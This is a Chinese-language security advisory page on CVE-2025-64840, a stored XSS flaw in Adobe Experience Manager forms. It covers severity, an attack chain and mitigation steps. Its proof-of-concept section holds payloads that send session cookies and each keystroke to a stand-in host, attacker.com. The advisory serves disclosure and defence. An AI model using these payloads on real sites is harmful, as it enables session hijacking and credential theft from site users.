IPBUF安全漏洞报告
English
CVE-2025-64840 CVSS 5.4 中危

CVE-2025-64840 Adobe Experience Manager 存储型XSS漏洞

披露日期: 2025-12-10

漏洞信息

漏洞编号
CVE-2025-64840
漏洞类型
存储型跨站脚本攻击(Stored XSS)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Adobe Experience Manager

相关标签

CVE-2025-64840Adobe Experience Manager存储型XSS跨站脚本AEMAdobe安全漏洞APSB25-115中危漏洞Web安全内容管理系统

漏洞概述

CVE-2025-64840是Adobe Experience Manager中的一个存储型跨站脚本(Stored XSS)漏洞。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。攻击者可以利用此漏洞通过低权限账号在表单字段中注入恶意JavaScript脚本。当其他用户浏览包含恶意内容的页面时,这些脚本将在其浏览器中执行,可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。由于是存储型XSS,恶意脚本会永久保存在服务器端,影响所有访问该页面的用户。Adobe官方已确认此漏洞并发布安全公告APSB25-115,建议用户尽快升级到最新版本以修复此安全问题。

技术细节

该漏洞是存储型XSS(Stored Cross-Site Scripting)漏洞,存在于Adobe Experience Manager的表单处理模块中。攻击者具有低权限(PR:L)即可利用此漏洞,无需管理员权限。漏洞的根本原因在于应用程序未能对用户输入进行充分的HTML/JavaScript转义处理,直接将用户提交的内容存储并在后续页面中渲染。当受害者(UI:R需要用户交互)浏览包含恶意脚本的表单字段页面时,浏览器会执行注入的JavaScript代码。攻击者可利用此漏洞窃取用户会话Cookie、伪造用户操作、植入钓鱼页面或重定向用户到恶意网站。CVSS 3.1评分5.4(AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)表明该漏洞可通过网络利用,复杂度低,但需要用户交互且影响范围有限。

攻击链分析

STEP 1
Reconnaissance
攻击者识别目标Adobe Experience Manager版本,确认版本<=6.5.23
STEP 2
Initial Access
攻击者使用低权限账号登录AEM,访问存在漏洞的表单页面
STEP 3
Payload Injection
攻击者在表单字段中注入恶意JavaScript代码,如<script>alert(document.domain)</script>
STEP 4
Storage
恶意脚本被永久存储在AEM服务器的内容库中
STEP 5
Execution
受害者访问包含恶意表单的页面,浏览器执行注入的JavaScript
STEP 6
Impact
攻击者实现会话劫持、敏感信息窃取或进一步渗透

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-64840 Stored XSS PoC --> <!-- Target: Adobe Experience Manager Forms --> <!-- Step 1: Inject malicious script via form field --> <form action="https://target-aem-host/content/forms/af/submit" method="POST"> <input type="hidden" name="./fieldName" value=' <script> // Steal session cookies document.location="https://attacker.com/log?c="+encodeURIComponent(document.cookie); </script> '> <input type="submit" value="Exploit"> </form> <!-- Step 2: Alternative payload - keylogger --> <script> document.addEventListener("keypress", function(e) { fetch("https://attacker.com/log?k=" + e.key); }); </script>

影响范围

Adobe Experience Manager 6.5.23及更早版本
Adobe Experience Manager 6.5.x系列所有版本

防御指南

临时缓解措施
立即升级Adobe Experience Manager至6.5.24或更高版本。如果无法立即升级,可临时采取以下措施:1)禁用或限制表单提交功能;2)实施严格的输入过滤规则;3)部署WAF规则阻止XSS攻击载荷;4)限制低权限用户创建或编辑表单内容;5)监控日志中的可疑脚本注入尝试。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表